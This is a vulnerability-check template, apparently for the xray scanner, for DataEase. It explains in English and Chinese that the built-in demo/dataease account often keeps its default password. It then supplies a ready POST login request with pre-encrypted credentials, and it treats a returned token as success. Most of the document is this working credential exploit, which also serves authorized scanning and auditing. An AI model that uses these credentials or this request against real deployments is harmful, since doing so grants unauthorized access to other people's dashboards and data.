Dataease has a built-in account demo/dataease, and many developers forget to delete or change the account password.
As a result, many Dataease can log in with this built-in account.
When logging in, js encrypts the account password with the public key,
so poc uses the account password encrypted by the public key,
manually uses demo/dataease when logging in to the web page.
DataEase有一个内置的demo/dataease,许多开发人员忘记删除或更改帐户密码。
因此,许多DataEase可以使用这个内置帐户登录。
在登录时,js使用公钥加密帐号密码,PoC使用公钥加密的帐号密码,在登录网页时就手动使用demo/dataase登录。
PoC代码[已公开]
id: dataease-default-account
info:
name: Dataease Default Account
author: hbdxmz
severity: high
verified: true
description: |
Dataease has a built-in account demo/dataease, and many developers forget to delete or change the account password.
As a result, many Dataease can log in with this built-in account.
When logging in, js encrypts the account password with the public key,
so poc uses the account password encrypted by the public key,
manually uses demo/dataease when logging in to the web page.
DataEase有一个内置的demo/dataease,许多开发人员忘记删除或更改帐户密码。
因此,许多DataEase可以使用这个内置帐户登录。
在登录时,js使用公钥加密帐号密码,PoC使用公钥加密的帐号密码,在登录网页时就手动使用demo/dataase登录。
reference:
- https://github.com/dataease/dataease/issues/5995
tags: dataease
created: 2023/11/30
rules:
r0:
request:
method: POST
headers:
Content-Type: application/json
path: /api/auth/login
body: |
{
"username": "HmFJtDmMa9MZjlWEpCNAo7Yh/hRBI7mrCRfFTok7wES7qcpIJ04x0OQXW5fwtL4WtN29408wyAupmtMjvvXjag==",
"password": "sL+oQsnErJMYGiLyzXj/Hy2opaZcSnfjGtYtm48q8tdkkINxzTtAOFI2NgDoorchFE790vWQYIgo1CMyjJ2jnw==",
"loginType": 0
}
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(b'"success":true,"message":null,"data":{"token":"ey')
expression: r0()